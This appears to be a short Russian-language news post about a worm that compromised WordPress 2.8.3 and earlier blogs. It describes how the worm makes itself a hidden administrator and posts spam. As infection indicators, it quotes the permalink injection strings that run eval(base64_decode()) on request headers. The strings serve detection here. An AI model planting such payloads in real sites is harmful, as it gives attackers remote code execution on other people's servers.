Массовое заражение блогов на WordPress

Массовое заражение блогов на WordPress

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает  добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.


%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки


‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой  нетривиальную задачу .

Цифровые следы - ваша слабость, и хакеры это знают.

Подпишитесь и узнайте, как их замести!